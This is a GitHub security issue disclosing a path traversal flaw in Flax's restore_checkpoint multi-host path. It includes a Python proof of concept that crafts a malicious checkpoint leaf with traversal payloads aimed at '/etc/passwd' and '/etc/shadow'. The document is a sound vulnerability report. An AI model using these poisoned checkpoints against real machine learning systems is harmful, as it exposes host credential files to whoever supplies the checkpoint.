Skip to content

[Security] Path traversal / arbitrary file read on restore_checkpoint via a malicious multiprocess-array placeholder leaf #5487

@geo-chen

Description

@geo-chen

Reporting here as confirmed with Google bug hunters:


We've reviewed it, and while we appreciate you flagging this, we need to let you know that we're no longer offering rewards for product vulnerabilities like this one in projects that fall into the OT2 or OT3 tiers. The Flax repository, https://github.com/google/flax, is currently categorized in this way for reward eligibility. You're still welcome to open an issue or submit a pull request directly on the GitHub repo if you'd like to help get this fixed!

Summary

restore_checkpoint treats any checkpoint leaf string beginning with the placeholder //GDAPlaceholder: as a multiprocess-array reference and joins the (attacker-controlled) suffix to the checkpoint directory with no confinement check. A crafted checkpoint can make flax open and read files outside the checkpoint directory (via tensorstore), through the documented multi-host restore path.

Details

flax/training/checkpoints.py, _restore_mpas (L333-334):

mpa_path = os.path.join(ckpt_path + MP_ARRAY_POSTFIX, value[len(MP_ARRAY_PH):])

value is a leaf taken from the msgpack checkpoint; the bytes after the MP_ARRAY_PH = '//GDAPlaceholder:' prefix (L71) are attacker-controlled. The result feeds get_tensorstore_spec(path) (L288) → gda_manager.deserialize(...) (L289), which opens and reads it. An absolute suffix (/etc/passwd) makes os.path.join discard the base; a ../ suffix escapes the …_gda dir. Root cause = save/restore asymmetry: on save the suffix is a benign relative pytree key (L183), on restore it is trusted unvalidated.

Reachability: the documented multi-host restore path — caller passes a gda_manager and a target containing a multiprocess (non-fully-addressable) jax.Array at the poisoned key (gating _check_mpa_errors). This is the normal state of arrays under jax.distributed/multi-host pjit.

PoC

poc_mpa_traversal.py crafts a msgpack checkpoint whose leaf is MP_ARRAY_PH + "/etc/passwd" and restores it with a recording array manager:

payload='/etc/passwd'             -> READ PATH: /etc/passwd   escaped_dir=True
payload='../../../../../etc/shadow' -> READ PATH: /etc/shadow  escaped_dir=True

poc_mpa_traversal.py:


#!/usr/bin/env python3
"""
PoC: arbitrary file read / path traversal in flax.training.checkpoints.restore_checkpoint
(flax 0.12.7). Sink: flax/training/checkpoints.py:333-334 (_restore_mpas) — an attacker leaf
"//GDAPlaceholder:<suffix>" is os.path.join'd onto the ckpt dir with no confinement; an
absolute/`..` suffix escapes, and flax reads it via tensorstore.

Precondition (documented multi-host restore): target has a non-fully-addressable jax.Array at
the poisoned key. MPALeaf is a faithful stand-in (isinstance jax.Array True, is_fully_addressable
False) — exactly an array's state under jax.distributed/multi-host pjit. No flax code modified.
Requires: pip install flax jax jaxlib
"""
import os, tempfile, jax, jax.numpy as jnp
from flax import serialization
from flax.training import checkpoints
from flax.training.checkpoints import MP_ARRAY_PH, _is_multiprocess_array

class MPALeaf:
    is_fully_addressable = False
    def __init__(self, a): object.__setattr__(self, "_a", a)
    def __getattr__(self, k): return getattr(object.__getattribute__(self, "_a"), k)
    @property
    def __class__(self): return type(jnp.arange(1))   # pass isinstance(.., jax.Array)

victim = MPALeaf(jnp.arange(4))
assert isinstance(victim, jax.Array) and _is_multiprocess_array(victim)
target = {"params": victim}
captured = {}
class RecordingGdaManager:
    def wait_until_finished(self): pass
    def deserialize(self, shardings, ts_specs, *a, **k):
        captured["ts_specs"] = list(ts_specs); return [jnp.zeros(4) for _ in ts_specs]

def run(payload):
    with tempfile.TemporaryDirectory() as d:
        ckpt = os.path.join(d, "checkpoint_0")
        open(ckpt, "wb").write(serialization.msgpack_serialize({"params": MP_ARRAY_PH + payload}))
        checkpoints.restore_checkpoint(ckpt, target=target, gda_manager=RecordingGdaManager())
        path = captured["ts_specs"][0]["kvstore"]["path"]
        escaped = not os.path.abspath(path).startswith(os.path.abspath(d))
        print(f"payload={payload!r:30} -> READ PATH {path}  escaped_dir={escaped}")
        return escaped

ok = run("/etc/passwd") and run("../../../../../../etc/shadow")
print("CONFIRMED: checkpoint leaf -> arbitrary out-of-dir read path" if ok else "not reproduced")
raise SystemExit(0 if ok else 1)

Impact

Loading an untrusted Flax checkpoint (a common ML supply-chain scenario) on the multi-host restore path reads arbitrary host files into the restore (confidentiality). No code-exec.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions